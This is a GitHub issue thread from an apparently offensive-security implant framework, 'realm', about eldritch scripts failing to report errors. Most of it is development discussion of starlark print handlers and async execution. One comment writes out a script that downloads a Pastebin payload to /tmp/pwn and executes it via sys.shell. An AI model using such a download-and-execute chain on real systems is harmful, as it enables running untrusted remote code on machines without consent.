### ISSUE TITLE
[bug] Report output on error

### ISSUE THREAD

**Issue by KCarretto** [KCarretto/realm#131]
**Describe the bug**
We received no output back from this tome, expected an error from the following eldritch:
```
"print(sys.shell(input_vars[\"cmd\"]))"
```

**Comment by KCarretto** [comment]
`"file.download('https://pastebin.com/raw/arXnJQK0', '/tmp/pwn')\ncmd = file.read('/tmp/pwn')\nsys.shell(cmd)"`

**Comment by hulto** [comment]
Check sys.shell('systemctl start service');

**Comment by hulto** [comment]
<img width="1389" alt="image" src="https://user-images.githubusercontent.com/7121375/223294997-4e315b8d-6b3d-433f-977b-0fead7a6f9b9.png">
Eldritch function might have to be asynchronous to be run asyncly like in imix or golem.

**Comment by hulto** [comment]
Resolving block_on

https://stackoverflow.com/questions/62536566/how-can-i-create-a-tokio-runtime-inside-another-tokio-runtime-without-getting-th#62536772

**Comment by hulto** [comment]
Implement PID not found error in DLL inject

**Comment by hulto** [comment]
https://docs.rs/starlark/latest/starlark/eval/struct.Evaluator.html#method.set_print_handler

Use this to better handle how print is managed.

**Comment by hulto** [comment]
In order to implement the set_print_handler we need to update to at least:
https://github.com/facebookexperimental/starlark-rust/tree/420db32488a99a929def7e5e697f3f39abecdb6d

Doing so thought may require a larger refactor on initial testing:
<img width="759" alt="image" src="https://user-images.githubusercontent.com/7121375/228374848-f5b52979-878d-4a72-8fa6-adb0129e78dd.png">

It seems our boilerplate needs to become much larger.
At this point I think we should look into implementing native functions per @KCarretto suggestion.
<img width="359" alt="image" src="https://user-images.githubusercontent.com/7121375/228375124-1badbaf2-3d79-40de-9266-feaf85842e31.png">

Still uses `impl StarlarkValue` so may encounter the same problem.
I'm going to resolve updating our version of starlark in a separate issue.

**Comment by hulto** [comment]
PR to update starlark.
https://github.com/KCarretto/realm/pull/180

**Comment by hulto** [comment]
First pass at implementing custom print handler:
**this works**:
![image](https://user-images.githubusercontent.com/7121375/230259739-bd1d72e1-4729-45da-a3c9-fc4817499598.png)
![image](https://user-images.githubusercontent.com/7121375/230259767-45ef8cc5-e938-4473-86b7-965036eade4d.png)

**This fails.**
![image](https://user-images.githubusercontent.com/7121375/230259635-4d6028a7-08d5-4080-8f32-1568192a7771.png)
![image](https://user-images.githubusercontent.com/7121375/230259814-74762d66-de80-487b-9282-ed69fe68a800.png)


Seems like complex types in the PrintHandler struct are causing issues.

**Comment by hulto** [comment]
Verifying print handler + mspc::channel works over thread::spawn.
![image](https://user-images.githubusercontent.com/7121375/230261410-38a3841b-26e5-4a7d-8c74-70ee63c85992.png)

**Comment by hulto** [comment]
May wish to build out a better way to report pre-check-in errors.
![image](https://user-images.githubusercontent.com/7121375/230502290-c3c5b9dc-4e91-4447-b4f3-d75c9e63051d.png)

In this situation we don't have a way to see that error.
